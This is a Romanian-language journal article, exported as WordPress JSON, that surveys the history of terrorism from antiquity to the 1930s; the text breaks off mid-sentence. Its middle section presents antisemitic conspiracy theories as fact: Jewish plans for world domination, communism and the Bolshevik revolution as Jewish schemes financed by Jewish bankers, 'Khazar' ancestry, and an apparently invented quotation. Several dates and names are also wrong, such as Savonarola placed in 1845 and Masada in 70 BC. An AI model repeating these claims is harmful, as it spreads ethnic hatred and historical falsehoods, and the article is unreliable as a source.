{"id":505,"date":"2010-12-07T22:26:51","date_gmt":"2010-12-07T20:26:51","guid":{"rendered":"http:\/\/aafdutm.ro\/revista\/?p=505"},"modified":"2010-12-07T22:26:51","modified_gmt":"2010-12-07T20:26:51","slug":"terorismul-repere-istorice","status":"publish","type":"post","link":"https:\/\/www.aafdutm.ro\/revista\/anul-ii\/terorismul-repere-istorice\/","title":{"rendered":"TERORISMUL  &#8211; REPERE  ISTORICE"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"color: #000000;\">TERRORISM \u2013 HISTORICAL BENCHMARK<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"> <\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong><em>Abstract<\/em><\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><em>This article briefly presents aspects regarding the appearance and evolution of the terrorist acts.<\/em><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><em>In the configuration of international criminality, important mutations took place throughout time, especially materialized in the revival of terrorism in its most violent forms.<\/em><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><em>During the last years such a pronounced ascension of the terrorist acts has occurred that some specialists warned that we may be facing a commencement of a real terrorist age. A significant increase of the number of active terrorist groups was noticed, as well as the number of countries in which they operate. Internal and international co-operation between terrorist groups has increased substantially.<\/em><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong><em>Key words: <\/em><\/strong><em>: terrorism; political assassination and political terror; Hassan Ben Sabbah (the spiritual leader of terrorist groups); the reign of terror during the French revolution \u2013 1789; remaking of Jewish state and of the Temple of Solomon; the communist terrorist team; the double assassination from Marseille; the Gestapo and the S.S. troops; the terrorist acts during and after the Second World War; the terrorism at the beginning of the third millennium.<\/em><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong><em>Rezumat<\/em><\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><em>\u00cen\u00a0 articol, prezent\u0103m , \u00een mod succinct, aspecte privind apari\u0163ia \u015fi evolu\u0163ia actelor teroriste.\u00a0 \u00cen configura\u0163ia criminalit\u0103\u0163ii interna\u0163ionale, pe parcursul timpului, au avut loc muta\u0163ii importante, materializate mai ales \u00een recrudescen\u0163a terorismului \u00een formele sale cele mai violente.<\/em><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><em>\u00cen ultimii ani s-a \u00eenregistrat o ascensiune at\u00e2t de pronun\u0163at\u0103 a actelor teroriste, \u00eenc\u00e2t unii speciali\u015fti au avertizat c\u0103 ar fi posibil s\u0103 ne afl\u0103m la \u00eenceputul unei adev\u0103rate ere a terorismului. S-a constatat o cre\u015ftere \u00eensemnat\u0103 a num\u0103rului de grup\u0103ri teroriste active, ca \u015fi a num\u0103rului de \u0163\u0103ri \u00een care opereaz\u0103. Cooperarea intern\u0103 \u015fi interna\u0163ional\u0103 dintre grupurile teroriste a crescut substan\u0163ial.<\/em><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong><em>Cuvinte cheie: <\/em><\/strong><em>terorism; asasinatul politic \u015fi teroarea politic\u0103; Hassan Ben Sabbah (p\u0103rintele spiritual al grup\u0103rilor teroriste); domnia terorii \u00een timpul Revolu\u0163iei franceze \u2013 1789; atentatele asupra unor demnitari; refacerea statului evreu \u015fi a Templului lui Solomon; echipa de terori\u015fti comuni\u015fti; dublul asasinat de la Marseille; Gestapoul \u015fi trupele S.S.; actele teroriste pe timpul \u015fi dup\u0103 cel de-al doilea r\u0103zboi mondial; terorismul la \u00eenceputul mileniului trei.<\/em><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"> <\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong><em> <\/em><\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>1. Perioada p\u00e2n\u0103 la sf\u00e2r\u015fitul secolului XX<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"> <\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Pe parcursul timpului, \u00een configura\u0163ia criminalit\u0103\u0163ii interna\u0163ionale au avut loc muta\u0163ii importante, materializate mai ales \u00een recrudescen\u0163a terorismului \u00een forme dintre cele mai violente.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cenceputul terorismului ca form\u0103 a violen\u0163ei a ap\u0103rut la \u00eenceputul vie\u0163ii omului pe p\u0103m\u00e2nt. Religia a constituit motivul unor dezl\u0103n\u0163uiri cu violen\u0163\u0103 a oamenilor. A ap\u0103rut o serie de curente, unele grupuri l-au renegat pe Dumnezeu, au recurs la acte de teroare, la asasinate. Erau frac\u0163iuni care aveau convingerea c\u0103 se apropie \u201eceasul m\u00e2ntuirii\u201d \u015fi c\u0103\u00a0 lupta \u00eempotriva necredincio\u015filor este o dovad\u0103 \u00een fa\u0163a lui Dumnezeu a credin\u0163ei adev\u0103rate.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cea mai puternic\u0103 \u015fi dur\u0103 ripost\u0103 a fost cea a legiunilor romane, \u00eentre care Templul &#8211; centrul ritual al iudaismului &#8211; \u015fi decimarea popula\u0163iei evreie\u015fti, care a determinat diaspora sa istoric\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cel mai puternic masacru a avut loc la Masada \u00een anul 70 \u00ee.Hr, c\u00e2nd s-a petrecut ultima redut\u0103 a rezisten\u0163ei antiromane.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen antichitate, teroarea era un instrument al politicii r\u0103zboiului. Aceast\u0103 teroare a fost folosit\u0103 ca instrument al luptei politice dintre diverse grupuri, ce \u00eentre\u0163inea puterea \u00eentr-un stat.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Asasinatul politic \u015fi teroarea politic\u0103 au fost fenomene folosite de romani.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen evul mediu, la fel ca \u015fi \u00een antichitate, teroarea a fost generat\u0103 de lupta \u00eentre religii, ce a dominat \u00een principal conflictele epocii, precum \u015fi lupta \u00eentre grupurile rivale, ce doreau accesul la conducerea politic\u0103 a statului. Multe asasinate au existat \u00een Orientul Apropiat.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">P\u0103rintele spiritual al asasinilor a fost Hassan Ben Sabbah, un \u00eenalt func\u0163ionar al vizirului din Cairo, care s-a autoexilat \u00een regiunea muntoas\u0103 din sudul M\u0103rii Caspice.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Acesta a pus bazele regatului asasinilor, grupare ierarhizat\u0103 \u00een mai multe grade. (Cuv\u00e2ntul \u201easasin\u201d provine din limba arab\u0103, traduc\u00e2ndu-se prin consumator de ha\u015fi\u015f sau toxicoman).<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Marea majoritate a asasinilor\u00a0 devota\u0163i primea un pumnal aurit, ca semn al misiunilor pe care le aveau de \u00eendeplinit, primind ordine stricte \u015fi exacte \u00een leg\u0103tur\u0103 cu victimele viitoarelor atentate, ce urmau s\u0103 se produc\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen cei 34 de ani de domnie a lui Hassan Ben Sabbah (a murit \u00een anul 1124), p\u0103rintele spiritual al grup\u0103rilor teroriste, au avut loc\u00a0 sute de atentate teroriste la ordin.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Domnia terorii \u201easasinilor\u201d a luat sf\u00e2r\u015fit \u00een Persia, prin invazia mongol\u0103 a lui Gingis Han. \u201cAsasinii\u201d au fost asasina\u0163i \u00een mas\u0103 de lupt\u0103torii lui Gingis Han.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen aceast\u0103 perioad\u0103, Europa cunoa\u015fte numeroase conflicte, r\u0103zboaie religioase \u015fi primele cruciade. Instaurat\u0103 \u00een anul 1845, \u00een Floren\u0163a, dictatura\u00a0 teocratic\u0103 a lui Savonarola, \u00een numele \u201cGuvernului lui Dumnezeu\u201d, a terorizat \u00eentreaga peninsul\u0103 italian\u0103 prin valuri de masacre, crime \u015fi jafuri.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen India a ac\u0163ionat frac\u0163iunea terorist\u0103 \u201eThugi\u201d,\u00eencep\u00e2nd cu anul 1356, care ataca oligarhia brahman\u0103 \u015fi centrele de putere islamic\u0103, instalate \u00een India dup\u0103 secolul al XII-lea.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen Japonia medieval\u0103, frica \u015fi teroarea dominau popula\u0163ia, lupt\u0103torii purtau numele de \u201eninja\u201d.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen epoca modern\u0103, terorismul\u00a0 se manifest\u0103 pentru prima dat\u0103 \u00een istorie ca fenomen social.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Domnia Terorii s-a instaurat \u00een timpul Revolu\u0163iei franceze din 1789 de c\u0103tre Robespierre, \u00een numele dictaturii iacobine, perioad\u0103 \u00een care violen\u0163a fizic\u0103, amenin\u0163area cu violen\u0163a, masacrele, execu\u0163iile \u00een mas\u0103 ale opozan\u0163ilor \u015fi mai apoi chiar ale alia\u0163ilor sunt s\u0103v\u00e2r\u015fite \u00een numele unor legi eradicate de puterea ce reprezenta, atunci, statul. \u00cen numele acestei \u201edomnii a terorii\u201d au fost aresta\u0163i peste 350.000 de oameni, din care numai 17.030 au fost judeca\u0163i de \u201etribunalele poporului\u201d \u015fi executa\u0163i,iar al\u0163ii au murit \u00een \u00eenchisori f\u0103r\u0103 a fi judeca\u0163i. Robespierre a c\u0103zut chiar el victima propriei sale dictaturi, fiind ulterior judecat \u015fi executat (1794).<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Dup\u0103 judecarea lui Robespierre, agen\u0163ii \u015fi partizanii tribunalelor iacobine au fost eticheta\u0163i drept \u201eterori\u015fti,\u201dastfel c\u0103 a ap\u0103rut denumirea de \u201eterorism de stat\u201d.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Pe parcurs, \u00een Fran\u0163a a ap\u0103rut o nou\u0103 atitudine extremist\u0103: anarhismul. S-au radicalizat mi\u015fc\u0103rile muncitore\u015fti protestatare, care au zguduit Fran\u0163a.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Au ap\u0103rut afi\u015fe cu \u00eendemnuri teroriste de genul: \u201dScoate\u0163i cu\u0163itele, jefui\u0163i, pune\u0163i la cale incendii! Distruge\u0163i,Ucide\u0163i! Tr\u0103iasc\u0103 revolta!, Tr\u0103iasc\u0103 incendiatorii!, Moarte asupritorilor!\u201c.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen actele teroriste \u00eencep s\u0103 fie folosite,ca mijloc de lupt\u0103, bombele \u015fi armamentul. A\u015fa de exemplu, la re\u015fedin\u0163a procurorului Republicii a fost plasat\u0103 o bomb\u0103; o grupare\u00a0 terorist\u0103 a aruncat \u00een aer, \u00een anul 1892, Comisariatul de poli\u0163ie din Rue des Bons-Enfants, provoc\u00e2nd moartea a cinci comisari; atacurile teroriste cu bombe asupra palatului Bourbon, sediul Parlamentului, l-au avut ca \u0163int\u0103 pe Charles Dupny, \u015feful guvernului, atac a c\u0103rui reu\u015fit\u0103 a fost \u00eempiedicat\u0103 de \u00eent\u00e2rzierea exploziei.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Curentul anarho-terorist cap\u0103t\u0103 \u015fi conota\u0163ii psihopatologice, \u00een slujba lui ac\u0163ion\u00e2nd indivizi psihopa\u0163i, declasa\u0163i sau marginaliza\u0163i social. De exemplu, un anarhist suedez, care, \u00een anul 1893, l-a ucis pe ambasadorul s\u00e2rb Ivan Georgevic, pentru c\u0103 acesta afi\u015fa o opulen\u0163\u0103 ofensatoare, precum \u015fi cazul unui italian,\u00a0 care a \u00eencercat asasinarea pre\u015fedintelui Fran\u0163ei \u2013 Sadi Carnot.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen Rusia, \u00eenc\u0103 din secolul al XVI-lea,\u0163arul Ivan cel Groaznic\u00a0 a folosit teroarea \u00eempotriva tuturor supu\u015filor. Ulterior, \u0163arul Nicolae I a utilizat \u015fi el teroarea \u00eempotriva poporului.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cele\u00a0 mai multe atentate au avut loc asupra \u0163arului Alexandru al II-lea al Rusiei. Cea de-a \u015faptea tentativ\u0103 asupra acestuia a fost bine preg\u0103tit\u0103 de 40 de comploti\u015fti. Ace\u015ftia au s\u0103pat \u00een Petersburg un tunel, pornind dintr-o magazie p\u00e2n\u0103 la mijlocul str\u0103zii, pe unde urma s\u0103 treac\u0103 \u0163arul, \u00een care au plasat o min\u0103 preg\u0103tit\u0103 pentru a exploda. \u00cen ultimul moment, coloana imperial\u0103 a evitat traseul minat. Unul dintre comploti\u015fti, studentul Nicolai Ivanovici R\u00e2sakov, a aruncat o grenad\u0103 asupra saniei imperiale, dup\u0103 care a deschis focul cu un revolver. Garda, format\u0103 din cazaci, a fost distrus\u0103. \u0162arul a cobor\u00e2t din sania distrus\u0103, printre cadavrele cazacilor. Un alt complotist a aruncat\u00a0 o bomb\u0103 la picioarele \u0163arului, care a fost sf\u00e2rtecat de explozia bombei.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Un alt atentat a fost \u00een 1898, asupra Elenei, \u00eemp\u0103r\u0103teasa Austriei \u015fi regina Ungariei. Un fanatic iresponsabil, pe nume Luigi Luccheni, a \u00eenjunghiat-o pe \u00eemp\u0103r\u0103teas\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Nici extinderea la scar\u0103 interna\u0163ional\u0103 a activit\u0103\u0163ii teroriste nu este de dat\u0103 recent\u0103: stau m\u0103rturie tulbur\u0103rile provocate de diverse grupuri anarhiste, ce operau \u00een Europa \u015fi America de Nord, la sf\u00e2r\u015fitul secolului XIX \u015fi la \u00eenceputul secolului XX.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Primul caz de terorism interna\u0163ional, la \u00eenceputul secolului XX, citat de istorici, este al rebelului marocan Raisuli care, r\u0103pind un cet\u0103\u0163ean american \u015fi unul englez, a for\u0163at guvernele Statelor Unite \u015fi Angliei s\u0103 intervin\u0103 pe l\u00e2ng\u0103 guvernul Fran\u0163ei, care, la r\u00e2ndul s\u0103u, era constr\u00e2ns s\u0103-l determine pe sultanul Marocului s\u0103-i satisfac\u0103 cererile: o r\u0103scump\u0103rare substan\u0163ial\u0103,eliberarea unui mare num\u0103r de prizonieri, cedarea a dou\u0103 zone teritoriale \u015fi arestarea c\u00e2torva inamici importan\u0163i.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen prima jum\u0103tate a secolului XX, actele de terorism au luat amploare, unele dintre ele dup\u0103 planuri riguros preg\u0103tite. Aceste acte de terorism au avut consecin\u0163e istorice foarte grave, \u00eenc\u00e2t au condus la declan\u015farea primei conflagra\u0163ii din istoria omenirii.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen perioada 1910-1914, s-au \u00eenregistrat \u015fase atentate la via\u0163a demnitarilor din familia de Habsburg. \u00cen ziua de 28 iunie 1914 a fost asasinat Frantz Ferdinand, mo\u015ftenitorul tronului austro-ungar, la Sarajevo, capitala provinciei Bosnia-Her\u0163egovina.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Acest atentat a fost pus la cale de organiza\u0163ia s\u00e2rbeasc\u0103 \u201dLibertate sau moarte\u201c, care ap\u0103ruse \u00een urma anex\u0103rii Bosniei de c\u0103tre Austria, \u00een 1908, organiza\u0163ie condus\u0103 de colonelul Dragutin Dimitrijevici. Ofi\u0163erul, care avea numele de cod \u201dColonelul Apis\u201c, a organizat \u015fi atentatul terorist din anul 1903, soldat cu asasinarea regelui s\u00e2rb Alexandru Obrenovici \u015fi a reginei Draga.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Atentatele politice teroriste comandate devin modalit\u0103\u0163i\u00a0 frecvente de tran\u015fare sau rezolvare a conflictelor externe.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u0162\u0103rile cu regimuri extremiste au recurs la ac\u0163iuni teroriste concepute prin lichidare fizic\u0103 \u015fi terorizare.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Pentru a \u00een\u0163elege anumite probleme legate de activit\u0103\u0163ile teroriste ale \u00eenceputului secolului XX, vom prezenta c\u00e2teva probleme legate de apari\u0163ia Uniunii Sovietice \u015fi activit\u0103\u0163ile desf\u0103\u015furate pentru introducerea ideologiei comuniste pe plan interna\u0163ional.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Statul evreu a fost distrus \u00een anul 70 d.Hr. Evreii semi\u0163i, ca \u015fi fenicienii,\u00a0 \u015fi-au stabilit colonii migratoare \u00een s\u00e2nul altor na\u0163iuni, colonii constituite \u00een \u201cDiaspora\u201c.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Dup\u0103 ce romanii le-au distrus\u00a0 statul \u015fi Templul, iudaismul, deja r\u0103sp\u00e2ndit \u00een interiorul altor na\u0163iuni, s-a \u00eent\u0103rit \u015fi a sporit cu num\u0103rul evreilor refugia\u0163i.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u201cDiaspora \u201c a fost perfect organizat\u0103 institu\u0163ional, conserv\u00e2ndu-\u015fi identitatea religioas\u0103 \u015fi persever\u00e2nd \u00eentr-o solidaritate organic\u0103 \u015fi politic\u0103 coordonat\u0103 la scar\u0103 mondial\u0103, de-a lungul secolelor, de c\u0103tre sinodurile rabinice desf\u0103\u015furate, de regul\u0103, \u00een secret.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Refacerea statului evreu \u015fi a Templului lui Solomon a fost\u00a0 \u00eens\u0103, pentru mul\u0163i dintre evrei, o preocupare permanent\u0103 de-a lungul\u00a0 acestor secole. \u00cenc\u0103 din secolul al doilea d.Hr., evreii au \u00eenceput s\u0103 organizeze recucerirea Palestinei prin mijloace politico-militare.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Evreul Jules Marigny \u00een cartea sa \u201cIstoria economiei popoarelor vechi\u201d (1878)- scria \u201c St\u0103p\u00e2nul aurului va fi st\u0103p\u00e2nul lumii. Cine vor fi st\u0103p\u00e2nii lumii dac\u0103 nu evreii?..<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Noi vom vedea cur\u00e2nd c\u0103 Israelul, dup\u0103 ce va ajunge \u00een posesia tuturor averilor lumii, va domina, se va extinde \u015fi va cre\u015fte, st\u0103p\u00e2nind popoarele ca pe o ciread\u0103\u201d<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Comunismul p\u0103rea unul dintre mijloacele scopului evreiesc. Doctrinarul comunismului, evreul\u00a0 Karl Marx urm\u0103rea alc\u0103tuirea\u00a0 republicii mondiale, unind masele muncitoare sub conducerea evreilor.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Prima Interna\u0163ional\u0103 Comunist\u0103 a fost \u00eenfiin\u0163at\u0103 de Alian\u0163a Drep\u0163ilor la Londra, \u00een anul 1864, sub conducerea lui Karl Marx.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Marx \u015fi Engels ar\u0103tau \u00een prefa\u0163a Manifestului Comunist c\u0103 au redactat programul teoretic al comunismului, de c\u0103tre societatea secret\u0103 Liga Comuni\u015ftilor.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Trusturile industriale \u015fi financiare americane au contribuit masiv la finan\u0163area Revolu\u0163iei bol\u015fevice din 1917.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen cadrul Congresului din noiembrie 1916, Fra\u0163ii Alian\u0163ei (organiza\u0163ie masonic\u0103 evreiasc\u0103) l-au numit pe evreul bancher Iacob Schiff pre\u015fedinte al \u201emi\u015fc\u0103rii bol\u015fevice\u201d. Evreul Lev Davidovici Bronstein, zis Tro\u0163ki, \u00een prim\u0103vara anului 1917, s-a c\u0103s\u0103torit cu fiica evreului bancher. Ob\u0163in\u00e2nd de la socrul s\u0103u 20 de milioane de dolari, Tro\u0163ki a plecat \u00een Elve\u0163ia, unde s-a \u00eent\u00e2lnit cu Vladimir Ulianov, zis \u201cLenin\u201d,\u00a0 \u015fi al\u0163i trei evrei Khazari pe linie matern\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">La Stockholm, \u00eenainte de a urca \u00een trenul special, Lenin a mai primit \u00eenc\u0103 5 milioane de dolari din partea altui evreu, Karl Sobelsohn, zis Radek.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u015ei la rom\u00e2ni, tot evreii au fost promotorii comunismului, plec\u00e2nd de la doctrinarul Dobrogeanu-Gherea, un evreu clandestin, pe numele s\u0103u real Katz. (\u00cen 1893 a \u00eenfiin\u0163at P. S. Democratic Rom\u00e2n).<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong> <\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>La 8 decembrie 1920, echipa de terori\u015fti comuni\u015fti (evrei) condus\u0103 de Max Goldstein a declan\u015fat o bomb\u0103 \u00een cl\u0103direa Senatului Rom\u00e2niei.<\/strong> Au murit \u00een primul atentat terorist din Rom\u00e2nia ministrul Justi\u0163iei, Dimitrie Greceanu, episcopul Oradei, Radu Dimitrie \u015fi senatorul Spirescu, iar pre\u015fedintele Senatului, generalul Constantin Coand\u0103, a fost grav r\u0103nit.(Echipa de terori\u015fti evrei: Gelber Moscovici, Leon Lichtblau, Saul Ozias, Willy Trux, Iosif Kahane, Ra\u015fela Holzman \u015fi al\u0163ii, care au fost preg\u0103ti\u0163i \u00een Rusia sovietic\u0103, la Odessa). Printre organizatorii actului terorist s-a aflat \u015fi Ana Pauker.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen perioada 2-6 martie 1919, la Petrograd a avut loc Congresul de constituire a Interna\u0163ionalei Comuniste, Komintern-ul. Lenin vedea acest Komintern ca \u00eenceputul \u201cinterna\u0163ionaliz\u0103rii revolu\u0163iei\u201c. Kominternul trebuia s\u0103 fie un stat major al \u201crevolu\u0163iei mondiale proletare\u201c.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Au loc \u00eencerc\u0103ri de puci \u00een Bavaria, Germania, Ungaria, Finlanda \u015fi \u00een alte \u0163\u0103ri. Au loc proteste, provoc\u0103ri, grave atentate, grupuri\u00a0 clandestine ac\u0163ionau cu\u00a0 amestecul agen\u0163ilor sovietici \u015fi ai fidelilor locali instrui\u0163i \u00een Rusia.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">La 8 mai 1921, comuni\u015ftii organizeaz\u0103, la Bucure\u015fti, Congresul de constituire a Partidului Comunist din Rom\u00e2nia. S-a votat afilierea partidului la Interna\u0163ionala a III-a (Komintern).<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen Rom\u00e2nia, \u00een anul 1921, erau 728.115 evrei (dup\u0103 recens\u0103m\u00e2ntul efectuat).<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen prima jum\u0103tate a secolului XX, U.R.S.S., cu sprijinul NKVD, a desf\u0103\u015furat activit\u0103\u0163i teroriste \u015fi asasinate \u00eempotriva celor care se opuneau bol\u015fevismului.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">NKVD-ul a ac\u0163ionat nu numai \u00een interior, dar \u015fi \u00een exteriorul \u0163\u0103rii. A\u015fa, de exemplu, Lev Davidovici Bronstein, cunoscut sub numele de Leon Tro\u0163ki, unul din co-fondatorii U.R.S.S., a c\u0103zut victim\u0103 terorismului sovietic. Leon Tro\u0163ki se refugiase \u00een Mexic, unde locuia \u00eentr-o vil\u0103 fortificat\u0103. Un comando, format din 24 de agen\u0163i, a atacat casa, folosind arme de foc \u015fi trei grenade de m\u00e2n\u0103. La reu\u015fita ac\u0163iunii a contribuit un agent sovietic, infiltrat \u00een staff-ul lui Tro\u0163ki.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Lenin \u015fi succesorul s\u0103u, Stalin, \u015fi-au lichidat inclusiv\u00a0 tovar\u0103\u015fii cu care au luptat pentru introducerea bol\u015fevismului, a\u015fa cum a fost cazul lui Serghei Kirov, secretarul Partidului Comunist din Leningrad, \u00eempu\u015fcat chiar pe culoarele Comitetului Central.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Regimurile Hitler, Mussolini \u015fi Horthy au fost regimuri de trist\u0103 \u015fi dramatic\u0103 faim\u0103, \u00een timpul c\u0103rora teroarea a fost ridicat\u0103 la rang de lege. Pentru a consolida regimurile totalitare, atentatul terorist a fost o practic\u0103 \u015fi o metod\u0103 a regimurilor lui Hitler, Mussolini \u015fi Horthy.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Un atentat care a zguduit Europa a fost comis \u00een 1934 \u00eempotriva cancelarului Austriei, Engelbert Dolfus, care se \u00eempotrivea ascensiunii fascismului. Atacul s-a produs chiar la sediul cancelariei. Comploti\u015ftii au ocupat primul etaj \u015fi au arestat circa 150 de func\u0163ionari ai cancelariei, dup\u0103 care au intrat \u00een biroul cancelarului, iar un anume Otto Planeta l-a \u00eempu\u015fcat pe cancelar. Atentatul a fost pus la cale de nazi\u015ftii austrieci, care erau de acord cu alipirea Austriei la Germania nazist\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Tot \u00een anul 1934 a avut loc dublul asasinat de la Marsilia, c\u0103ruia i-au c\u0103zut victim\u0103 dou\u0103 personalit\u0103\u0163i de frunte ale Europei, respectiv regele Alexandru I. Karagheorghevici al Iugoslaviei \u015fi ministrul de externe francez Louis Barthou.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cum s-a \u00eent\u00e2mplat? Suveranul iugoslav a efectuat o vizit\u0103 \u00een Fran\u0163a, la Marsilia. Dup\u0103 \u00eencheierea ceremoniei de sosire, regele Alexandru s-a suit, al\u0103turi de ministrul de externe francez, \u00eentr-un autoturism descoperit. \u00cen momentul \u00een care coloana a ajuns \u00eentr-o pia\u0163\u0103, un b\u0103rbat necunoscut s-a urcat pe scara ma\u015finii oficiale \u015fi a deschis focul asupra pasagerilor, cu un pistol automat de calibru 9 mm. Cei doi au fost uci\u015fi, precum \u015fi dou\u0103 femei aflate pe trotuar. Atentatorul a fost ucis, la r\u00e2ndul lui, de o persoan\u0103 din mul\u0163ime, totul f\u0103c\u00e2nd parte dintr-un plan bine stabilit, menit s\u0103 \u015ftearg\u0103 orice urm\u0103 a actului terorist.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Ulterior s-a stabilit c\u0103 teroristul se numea Vladimir Gheorghiev \u015fi f\u0103cea parte din organiza\u0163ia fascist croat\u0103 \u201cUSTASA\u201d , care era sprijinit\u0103 de Hitler \u015fi Mussolini.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Terorismul ca arm\u0103 politic\u0103 a fost folosit cu succes de c\u0103tre Hitler, care, prin metode crude \u015fi barbare, \u00ee\u015fi atingea scopurile propuse, lichid\u00e2ndu-i pe oponen\u0163ii regimului s\u0103u.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Hitler \u015fi-a\u00a0 constituit Gestapoul \u015fi trupele S.S.(cap de mort), care erau investite cu puteri nelimitate. Aceste organiza\u0163ii au fost incriminate \u00een cadrul procesului de la N\u00fcrenberg.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen Europa interbelic\u0103, \u00eendeosebi \u00een perioada premerg\u0103toare celui de-al doilea r\u0103zboi mondial, terorismul a fost ridicat la rang de politic\u0103 de stat, fiind considerat cea mai eficient\u0103 metod\u0103 de a \u0163ine \u00een fr\u00e2u masele, poporul sau popula\u0163ia dominant\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u015ei \u00een S.U.A. au avut loc unele acte teroriste, din care amintim atentatul din anul 1933 \u00eempotriva pre\u015fedintelui \u0163\u0103rii, Franklin Roosevelt.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Acesta c\u00e2\u015ftigase alegerile \u015fi urma s\u0103 preia func\u0163ia \u00een urm\u0103toarea perioad\u0103. Pentru a mul\u0163umi popula\u0163iei a efectuat o vizit\u0103 \u00een 